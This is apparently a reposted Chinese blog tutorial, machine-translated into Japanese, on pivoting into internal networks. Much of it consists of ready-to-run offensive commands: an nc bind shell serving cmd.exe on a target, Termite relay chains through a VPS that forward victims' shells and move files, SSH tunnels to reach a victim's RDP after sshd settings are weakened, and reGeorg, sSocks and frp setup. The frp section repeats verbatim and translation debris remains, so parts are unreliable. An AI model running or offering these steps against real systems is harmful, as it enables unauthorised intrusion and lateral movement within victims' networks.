イントラネットプロキシの侵入

イントラネットプロキシの侵入

イントラネットの浸透を実現するツールは、Earthworm、Termite、reGeorg、nps など多数ありますが、ここでは主に擬似イントラネットを運用するための Termite を紹介します。Termite は EW (EarthWorm) の最新バージョンです。

1.NC工具の使用

Windows で nc を使用するには、nc.exe をインストールする必要があります。

ターゲットドローン

nc.exe -l -p 4444 -t -e cmd.exe

攻撃機

nc.exe 192.168.1.1 4444

Linux で nc を使用するには、netcat の使用法に関するブログのツール使用法の欄を参照してください。

2.シロアリの使用

非常にコンパクトで柔軟なスプリングボード マシンで、従来のソックス プロキシとは異なり、複雑なイントラネット環境への侵入に適しており、操作が非常に簡単です。 Termite はイントラネット侵入ツールであり、管理側の管理者とエージェント側のエージェントに分かれています。複数のプラットフォーム、スプリングボード マシン間の順方向および逆方向のカスケード、組み込みのシェル管理などをサポートします。

-| 指定本地socks端口,等待远程连
-C 指定远程socks机器ip
-p 指定远程socks机器端口
さまざまなシナリオでの使用方法:

1. ターゲットはパブリック ネットワーク内にあります。

目标A:agent_win32.exe -l 8888 

攻击PC:admin_win32.exe -c 目标ip -p 8888

2. ターゲットは内部ネットワーク上にありますが、外部ネットワークに接続できます

在vps运行:agent_win32.exe -l 8888 

在攻击PC运行:admin_win32.exe -c vps_ip -p 8888 

在靶机运行:agent_win32.exe -c vps_ip -p 8888

vps: 仮想プライベートサーバー

3. ターゲットは内部ネットワーク上にあり、外部ネットワークには接続できませんが、vnet1 経由でアクセスできます。

ここに画像の説明を挿入します

agent间正向连接

vnet2:
agent_windows_x86.exe -l 8888

vnet1:
agent_windows_x86.exe -l 7777

桥接:
agent_windows_x86.exe -l 6666

攻撃機:

admin_windows_x86.exe -c 192.168.1.144 -p 6666
goto 1
connect 192.168.1.128 7777
goto 2
connect 192.168.10.2 8888
goto 3
shell 4444  #将vnet2的cmd转发到本地的4444端口
nc 127.0.0.1 4444

エージェント間の逆接続:

桥接:
agent_windows_x86.exe -l 6666

vnet1:
agent_windows_x86.exe -l 7777

vnet2:
agent_windows_x86.exe 192.168.10.1 -p 7777

vnet1(新开一个cmd):
agent_windows_x86.exe -c 192.168.1.144 -p 6666

攻击机:
admin_windows_x86.exe -c 10.86.64.236 -p 6666

その他の一般的に使用される関数:

1.ソケットプロキシ

goto 对应id
socks 4444

goto 2    将当前被管理节点切换为 2 号节点。
socks 4444   此时,本地4444 端口会启动个监听服务,而服务提供者为2号节点。

2.シェル管理

shell 4444
nc -v 127.0.0.1 4444

goto 1
shell 4444     此时,通过nc本地的 4444 端口,就可以得到一个 1 节点提供的 shell.

3.ポートフォワーディング

lcxtran 本地端口 目标ip 目标端口
goto 2 
lcxtran 3388 10.0.0.1 3389    以2号节点为跳板,将 10.0.0.1 的 3389 端口映射至本地的 3388 端口

4. ファイルのアップロードとダウンロード

upfile 本地文件路径 目标路径
goto 2
upfile 2.txt 3.txt    将本地的 2.txt 上传至 2号节点的目录,并命名为3.txt

downfile 目标文件路径 本地存放路径
goto 1
downfile 1.txt 2.txt    将1 节点,目录下的 1.txt 下载至本地,并命名为2.txt

3.ssh

1. ローカル ポート フォワーディング (スプリングボード マシンには外部ネットワーク アドレスと内部ネットワーク アドレスがあります)

スプリングボード構成

vim /etc/ssh/sshd_config 			//SSH配置文件
AllowAgentForwarding yes            //是否允许转发TCP协议
GatewayPorts yes                    //是否允许远程主机连接本地转发端口
PermitRootLogin yes                 //是否允许root用户登陆
PasswordAuthentication yes          //是否允许使用基于密码的认证
TCPKeepAlive yes                    //保持心跳,防止ssh断开
service ssh restart //开启ssh服务
ssh命令参数:

-C      压缩传输,加快传输速度
-f      将SSH转入后台执行,不占用当前的shell
-N      建立静默连接(建立了连接,但是看不到具体会话)
-g      允许远程主机连接到本地用于转发的端口
-L      本地端口转发
-R      远程端口转发
-D      动态转发(socks代理)
-P      指定SSH端口

攻撃機

ssh -CfNg -L 2222:1.1.1.1:3389 [email protected]     
//将受害机的3389端口转发到本地2222端口,1.1.1.1是受害机,192.168.1.1跳板机

rdesktop 127.0.0.1:2222      //访问本地2222端口,就是访问受害机的3389端口

2. リモート ポート フォワーディング (スプリングボード マシンには外部ネットワーク アドレスがありませんが、外部ネットワークにアクセスできます)

踏み台マシン

ssh -R 3307:1.1.1.1:3389 [email protected] //1.1.1.1是受害机,192.168.1.9是攻击机

攻撃機

rdesktop 127.0.0.1:3307

3. 動的ポート転送 (スプリングボード マシンには外部ネットワーク アドレスと内部ネットワークがあります)

ssh -D 7000 [email protected] //攻击机与跳板机建立隧道,192.168.1.1是跳板机,root是跳板机的用户名

127.0.0.1 7000 をプロキシとして使用してイントラネット サービスにアクセスできます

4. 他のツールの使用

reGeorg ツールのアドレス:

 https://github.com/sensepost/reGeorg

reGeorg は reDuh のアップグレード バージョンで、主に http/https トンネルを介してイントラネット サーバーのポートをローカル マシンに転送してループを形成します。ターゲット サーバーがイントラネット上にある場合、またはポート ポリシーがある場合に、ターゲット サーバーがその内部オープン ポートに接続するために使用されます。 Webshel​​l を使用して、イントラネット侵入用の Socks プロキシを確立します。サーバーは、aspx、php、jsp などの Web プログラムのいずれかをサポートしている必要があります。

sSocks ツールのアドレス:

http://sourceforge.net/projects/ssocks/

sSocks は、Socks プロキシ サービスを有効にするために使用できる Socks プロキシ ツール スイートであり、socks5 検証をサポートし、IPV6 と UDP をサポートし、リモート コンピューターを Socks プロキシ サーバーとして使用してローカル コンピューターにバウンスするリバース Socks プロキシ サービスを提供します。 、イントラネットを大幅に容易にします。ペネトレーション テスト、最新バージョンは 0.0.14 です。

FRPイントラネット侵入ツール

frp は、イントラネットへの侵入に使用できる高性能リバース プロキシ アプリケーションです。tcp、udp、http、https プロトコルをサポートします。

ツールアドレス:

https://github.com/fatedier/frp

イントラネット上またはファイアウォールの背後にあるマシンを使用して、http または https サービスを外部ネットワーク環境に提供します。

http および https サービスの場合、ドメイン名ベースの仮想ホストとカスタム ドメイン名のバインドがサポートされているため、複数のドメイン名がポート 80 を共有できます。

イントラネット上またはファイアウォールの背後にあるマシンを使用して、自宅の ssh を介して会社のイントラネット環境のホストにアクセスするなど、外部ネットワーク環境に tcp および udp サービスを提供します。

主な文書の紹介:

frpc.exe-----------客户端

frpc.ini------------客户端配置文件

frps.exe------------服务端

frps.ini-------------服务器配置文件

構成も比較的単純です。

サーバー構成で必要なのは、リスニング ポートの構成のみです。

[common]

bind_port = 7000

クライアント構成:

[common]

server_addr = 127.0.0.1

server_port = 7000

走る:

サーバー上でコマンドを実行します。

.\frps -c ./frps.ini

クライアント実行コマンド:

.\frpc -c ./frpc.ini

他にも次のようなツールがあります

lcx,Ngrok,EW,reGeirg

これも比較的簡単です。

サーバー構成で必要なのは、リスニング ポートの構成のみです。

[common]

bind_port = 7000

クライアント構成:

[common]

server_addr = 127.0.0.1

server_port = 7000

走る:

サーバー上でコマンドを実行します。

.\frps -c ./frps.ini

クライアント実行コマンド:

.\frpc -c ./frpc.ini

他にも次のようなツールがあります

lcx,Ngrok,EW,reGeirg

リバースプロキシツールを待つ

おすすめ

転載: blog.csdn.net/huangyongkang666/article/details/123880395